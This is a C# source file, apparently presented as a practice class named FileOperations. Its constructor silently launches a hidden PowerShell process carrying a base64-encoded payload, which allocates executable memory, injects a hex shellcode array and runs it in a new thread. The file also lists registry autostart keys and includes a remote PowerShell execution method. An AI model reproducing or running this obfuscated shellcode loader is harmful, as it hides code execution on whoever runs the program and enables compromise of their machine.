using System;
using System.Collections.Generic;
using System.Diagnostics;
using System.Linq;
using System.Text;
using System.Threading.Tasks;

//powershell
using System.Collections.ObjectModel;
using System.Management.Automation;
using System.Management.Automation.Runspaces;

namespace C_Sharp_Practice
{
    public class FileOperations
    {
        public FileOperations()
        {
            Console.WriteLine("FileOperations constructor");
            getShellWithPowerShell();
        }

        /*
        If your machine boots with annoying applications, check these registry locations
        [HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run]
        [HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnce]
        [HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServices]
        [HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce]
        [HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit]

        [HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run]
        [HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce]
        [HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunServices]
        [HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce]
        [HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows]
        */
        private void addRegistryEntry()
        {
            Microsoft.Win32.RegistryKey key;
            key = Microsoft.Win32.Registry.CurrentUser.CreateSubKey("Names");
            key.SetValue("Name", "Isabella");
            key.Close();
        }

        private void runPSremotely(string machineAddress)
        {
            WSManConnectionInfo connectionInfo = new WSManConnectionInfo();
            connectionInfo.ComputerName = machineAddress;
            Runspace runspace = RunspaceFactory.CreateRunspace(connectionInfo);
            runspace.Open();
            using (PowerShell ps = PowerShell.Create())
            {
                ps.Runspace = runspace;
                ps.AddScript("Get-Service");
                var results = ps.Invoke();
                // Do something with result ... 
            }
            runspace.Close();
        }

        private void changeBackground()
        {

        }

        //Start-Process notepad -WindowStyle Hidden
        //Get-Process notepad
        private void getShellWithPowerShell()
        {
            System.Diagnostics.Process process = new System.Diagnostics.Process();
            System.Diagnostics.ProcessStartInfo startInfo = new System.Diagnostics.ProcessStartInfo();
            startInfo.WindowStyle = System.Diagnostics.ProcessWindowStyle.Hidden;
            startInfo.FileName = "powershell.exe";
            startInfo.Arguments = "-window hidden -enc JAAxACAAPQAgACcAJABjACAAPQAgACcAJwBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgBrAGUAcgBuAGUAbAAzADIALgBkAGwAbAAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABJAG4AdABQAHQAcgAgAFYAaQByAHQAdQBhAGwAQQBsAGwAbwBjACgASQBuAHQAUAB0AHIAIABsAHAAQQBkAGQAcgBlAHMAcwAsACAAdQBpAG4AdAAgAGQAdwBTAGkAegBlACwAIAB1AGkAbgB0ACAAZgBsAEEAbABsAG8AYwBhAHQAaQBvAG4AVAB5AHAAZQAsACAAdQBpAG4AdAAgAGYAbABQAHIAbwB0AGUAYwB0ACkAOwBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgBrAGUAcgBuAGUAbAAzADIALgBkAGwAbAAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABJAG4AdABQAHQAcgAgAEMAcgBlAGEAdABlAFQAaAByAGUAYQBkACgASQBuAHQAUAB0AHIAIABsAHAAVABoAHIAZQBhAGQAQQB0AHQAcgBpAGIAdQB0AGUAcwAsACAAdQBpAG4AdAAgAGQAdwBTAHQAYQBjAGsAUwBpAHoAZQAsACAASQBuAHQAUAB0AHIAIABsAHAAUwB0AGEAcgB0AEEAZABkAHIAZQBzAHMALAAgAEkAbgB0AFAAdAByACAAbABwAFAAYQByAGEAbQBlAHQAZQByACwAIAB1AGkAbgB0ACAAZAB3AEMAcgBlAGEAdABpAG8AbgBGAGwAYQBnAHMALAAgAEkAbgB0AFAAdAByACAAbABwAFQAaAByAGUAYQBkAEkAZAApADsAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAbQBzAHYAYwByAHQALgBkAGwAbAAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABJAG4AdABQAHQAcgAgAG0AZQBtAHMAZQB0ACgASQBuAHQAUAB0AHIAIABkAGUAcwB0ACwAIAB1AGkAbgB0ACAAcwByAGMALAAgAHUAaQBuAHQAIABjAG8AdQBuAHQAKQA7ACcAJwA7ACQAdwAgAD0AIABBAGQAZAAtAFQAeQBwAGUAIAAtAG0AZQBtAGIAZQByAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAGMAIAAtAE4AYQBtAGUAIAAiAFcAaQBuADMAMgAiACAALQBuAGEAbQBlAHMAcABhAGMAZQAgAFcAaQBuADMAMgBGAHUAbgBjAHQAaQBvAG4AcwAgAC0AcABhAHMAcwB0AGgAcgB1ADsAWwBCAHkAdABlAFsAXQBdADsAWwBCAHkAdABlAFsAXQBdACQAegAgAD0AIAAwAHgAZAA5ACwAMAB4AGMAZAAsADAAeABiAGEALAAwAHgANQA5ACwAMAB4ADYAZQAsADAAeAAxADQALAAwAHgAYwBkACwAMAB4AGQAOQAsADAAeAA3ADQALAAwAHgAMgA0ACwAMAB4AGYANAAsADAAeAA1ADgALAAwAHgAMwAzACwAMAB4AGMAOQAsADAAeABiADEALAAwAHgANAA3ACwAMAB4ADMAMQAsADAAeAA1ADAALAAwAHgAMQA4ACwAMAB4ADgAMwAsADAAeABjADAALAAwAHgAMAA0ACwAMAB4ADAAMwAsADAAeAA1ADAALAAwAHgANABkACwAMAB4ADgAYwAsADAAeABlADEALAAwAHgAMwAxACwAMAB4ADgANQAsADAAeABkADIALAAwAHgAMABhACwAMAB4AGMAYQAsADAAeAA1ADUALAAwAHgAYgAzACwAMAB4ADgAMwAsADAAeAAyAGYALAAwAHgANgA0ACwAMAB4AGYAMwAsADAAeABmADAALAAwAHgAMgA0ACwAMAB4AGQANgAsADAAeABjADMALAAwAHgANwAzACwAMAB4ADYAOAAsADAAeABkAGEALAAwAHgAYQA4ACwAMAB4AGQANgAsADAAeAA5ADkALAAwAHgANgA5ACwAMAB4AGQAYwAsADAAeABmAGUALAAwAHgAYQBlACwAMAB4AGQAYQAsADAAeAA2AGIALAAwAHgAZAA5ACwAMAB4ADgAMQAsADAAeABkAGIALAAwAHgAYwAwACwAMAB4ADEAOQAsADAAeAA4ADMALAAwAHgANQBmACwAMAB4ADEAYgAsADAAeAA0AGUALAAwAHgANgAzACwAMAB4ADUAZQAsADAAeABkADQALAAwAHgAOAAzACwAMAB4ADYAMgAsADAAeABhADcALAAwAHgAMAA5ACwAMAB4ADYAOQAsADAAeAAzADYALAAwAHgANwAwACwAMAB4ADQANQAsADAAeABkAGMALAAwAHgAYQA3ACwAMAB4AGYANQAsADAAeAAxADMALAAwAHgAZABkACwAMAB4ADQAYwAsADAAeAA0ADUALAAwAHgAYgA1ACwAMAB4ADYANQAsADAAeABiADAALAAwAHgAMQBkACwAMAB4AGIANAAsADAAeAA0ADQALAAwAHgANgA3ACwAMAB4ADEANgAsADAAeABlAGYALAAwAHgANAA2ACwAMAB4ADgAOQAsADAAeABmAGIALAAwAHgAOQBiACwAMAB4AGMAZQAsADAAeAA5ADEALAAwAHgAMQA4ACwAMAB4AGEAMQAsADAAeAA5ADkALAAwAHgAMgBhACwAMAB4AGUAYQAsADAAeAA1AGQALAAwAHgAMQA4ACwAMAB4AGYAYgAsADAAeAAyADMALAAwAHgAOQBkACwAMAB4AGIANwAsADAAeABjADIALAAwAHgAOABjACwAMAB4ADYAYwAsADAAeABjADkALAAwAHgAMAAzACwAMAB4ADIAYQAsADAAeAA4AGYALAAwAHgAYgBjACwAMAB4ADcAZAAsADAAeAA0ADkALAAwAHgAMwAyACwAMAB4AGMANwAsADAAeABiADkALAAwAHgAMwAwACwAMAB4AGUAOAAsADAAeAA0ADIALAAwAHgANQBhACwAMAB4ADkAMgAsADAAeAA3AGIALAAwAHgAZgA0ACwAMAB4ADgANgAsADAAeAAyADMALAAwAHgAYQBmACwAMAB4ADYAMwAsADAAeAA0AGMALAAwAHgAMgBmACwAMAB4ADAANAAsADAAeABlADcALAAwAHgAMABhACwAMAB4ADMAMwAsADAAeAA5AGIALAAwAHgAMgA0ACwAMAB4ADIAMQAsADAAeAA0AGYALAAwAHgAMQAwACwAMAB4AGMAYgAsADAAeABlADYALAAwAHgAYwA2ACwAMAB4ADYAMgAsADAAeABlADgALAAwAHgAMgAyACwAMAB4ADgAMwAsADAAeAAzADEALAAwAHgAOQAxACwAMAB4ADcAMwAsADAAeAA2ADkALAAwAHgAOQA3ACwAMAB4AGEAZQAsADAAeAA2ADQALAAwAHgAZAAyACwAMAB4ADQAOAAsADAAeAAwAGIALAAwAHgAZQBlACwAMAB4AGYAZQAsADAAeAA5AGQALAAwAHgAMgA2ACwAMAB4AGEAZAAsADAAeAA5ADYALAAwAHgANQAyACwAMAB4ADAAYgAsADAAeAA0AGUALAAwAHgANgA2ACwAMAB4AGYAZAAsADAAeAAxAGMALAAwAHgAMwBkACwAMAB4ADUANAAsADAAeABhADIALAAwAHgAYgA2ACwAMAB4AGEAOQAsADAAeABkADQALAAwAHgAMgBiACwAMAB4ADEAMQAsADAAeAAyAGQALAAwAHgAMQBiACwAMAB4ADAANgAsADAAeABlADUALAAwAHgAYQAxACwAMAB4AGUAMgAsADAAeABhADkALAAwAHgAMQA2ACwAMAB4AGUAYgAsADAAeAAyADAALAAwAHgAZgBkACwAMAB4ADQANgAsADAAeAA4ADMALAAwAHgAOAAxACwAMAB4ADcAZQAsADAAeAAwAGQALAAwAHgANQAzACwAMAB4ADIAZQAsADAAeABhAGIALAAwAHgAYgA4ACwAMAB4ADUANgAsADAAeABiADgALAAwAHgAOQA0ACwAMAB4ADkANQAsADAAeAA1ADkALAAwAHgAMgA2ACwAMAB4ADcAZAAsADAAeABlADQALAAwAHgANQA5ACwAMAB4ADQAMAAsADAAeAA2ADUALAAwAHgANgAxACwAMAB4AGIAZgAsADAAeAAzAGMALAAwAHgAYwA1ACwAMAB4ADIAMQAsADAAeAAxADAALAAwAHgAZgBjACwAMAB4AGIANQAsADAAeAA4ADEALAAwAHgAYwAwACwAMAB4ADkANAAsADAAeABkAGYALAAwAHgAMABkACwAMAB4ADMAZQAsADAAeAA4ADQALAAwAHgAZABmACwAMAB4AGMANwAsADAAeAA1ADcALAAwAHgAMgBlACwAMAB4ADMAMAAsADAAeABiAGUALAAwAHgAMAAwACwAMAB4AGMANgAsADAAeABhADkALAAwAHgAOQBiACwAMAB4AGQAYgAsADAAeAA3ADcALAAwAHgAMwA1ACwAMAB4ADMANgAsADAAeABhADYALAAwAHgAYgA3ACwAMAB4AGIAZAAsADAAeABiADUALAAwAHgANQA2ACwAMAB4ADcAOQAsADAAeAAzADYALAAwAHgAYgAzACwAMAB4ADQANAAsADAAeABlAGQALAAwAHgAYgA2ACwAMAB4ADgAZQAsADAAeAAzADcALAAwAHgAYgBiACwAMAB4AGMAOQAsADAAeAAyADQALAAwAHgANQBkACwAMAB4ADQAMwAsADAAeAA1AGMALAAwAHgAYwAzACwAMAB4AGYANAAsADAAeAAxADQALAAwAHgAYwA4ACwAMAB4AGMAOQAsADAAeAAyADEALAAwAHgANQAyACwAMAB4ADUANwAsADAAeAAzADEALAAwAHgAMAA0ACwAMAB4AGUAOQAsADAAeAA1AGUALAAwAHgAYQA3ACwAMAB4AGUANwAsADAAeAA4ADUALAAwAHgAOQBlACwAMAB4ADIANwAsADAAeABlADgALAAwAHgANQA1ACwAMAB4AGMAOQAsADAAeAAyAGQALAAwAHgAZQA4ACwAMAB4ADMAZAAsADAAeABhAGQALAAwAHgAMQA1ACwAMAB4AGIAYgAsADAAeAA1ADgALAAwAHgAYgAyACwAMAB4ADgAMwAsADAAeABhAGYALAAwAHgAZgAxACwAMAB4ADIANwAsADAAeAAyAGMALAAwAHgAOAA2ACwAMAB4AGEANgAsADAAeABlADAALAAwAHgANAA0ACwAMAB4ADIANAAsADAAeAA5ADEALAAwAHgAYwA3ACwAMAB4AGMAYQAsADAAeABkADcALAAwAHgAZgA0ACwAMAB4AGQAOQAsADAAeAAzADcALAAwAHgAMABlACwAMAB4ADMAMAAsADAAeABhAGMALAAwAHgANQA5ACwAMAB4ADkAMgA7ACQAZwAgAD0AIAAwAHgAMQAwADAAMAA7AGkAZgAgACgAJAB6AC4ATABlAG4AZwB0AGgAIAAtAGcAdAAgADAAeAAxADAAMAAwACkAewAkAGcAIAA9ACAAJAB6AC4ATABlAG4AZwB0AGgAfQA7ACQAeAA9ACQAdwA6ADoAVgBpAHIAdAB1AGEAbABBAGwAbABvAGMAKAAwACwAMAB4ADEAMAAwADAALAAkAGcALAAwAHgANAAwACkAOwBmAG8AcgAgACgAJABpAD0AMAA7ACQAaQAgAC0AbABlACAAKAAkAHoALgBMAGUAbgBnAHQAaAAtADEAKQA7ACQAaQArACsAKQAgAHsAJAB3ADoAOgBtAGUAbQBzAGUAdAAoAFsASQBuAHQAUAB0AHIAXQAoACQAeAAuAFQAbwBJAG4AdAAzADIAKAApACsAJABpACkALAAgACQAegBbACQAaQBdACwAIAAxACkAfQA7ACQAdwA6ADoAQwByAGUAYQB0AGUAVABoAHIAZQBhAGQAKAAwACwAMAAsACQAeAAsADAALAAwACwAMAApADsAZgBvAHIAIAAoADsAOwApAHsAUwB0AGEAcgB0AC0AcwBsAGUAZQBwACAANgAwAH0AOwAnADsAJABlACAAPQAgAFsAUwB5AHMAdABlAG0ALgBDAG8AbgB2AGUAcgB0AF0AOgA6AFQAbwBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoAFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAbgBpAGMAbwBkAGUALgBHAGUAdABCAHkAdABlAHMAKAAkADEAKQApADsAJAAyACAAPQAgACIALQBlAG4AYwAgACIAOwBpAGYAKABbAEkAbgB0AFAAdAByAF0AOgA6AFMAaQB6AGUAIAAtAGUAcQAgADgAKQB7ACQAMwAgAD0AIAAkAGUAbgB2ADoAUwB5AHMAdABlAG0AUgBvAG8AdAAgACsAIAAiAFwAcwB5AHMAdwBvAHcANgA0AFwAVwBpAG4AZABvAHcAcwBQAG8AdwBlAHIAUwBoAGUAbABsAFwAdgAxAC4AMABcAHAAbwB3AGUAcgBzAGgAZQBsAGwAIgA7AGkAZQB4ACAAIgAmACAAJAAzACAAJAAyACAAJABlACIAfQBlAGwAcwBlAHsAOwBpAGUAeAAgACIAJgAgAHAAbwB3AGUAcgBzAGgAZQBsAGwAIAAkADIAIAAkAGUAIgA7AH0A";
            process.StartInfo = startInfo;
            process.Start();
        }
    }
}
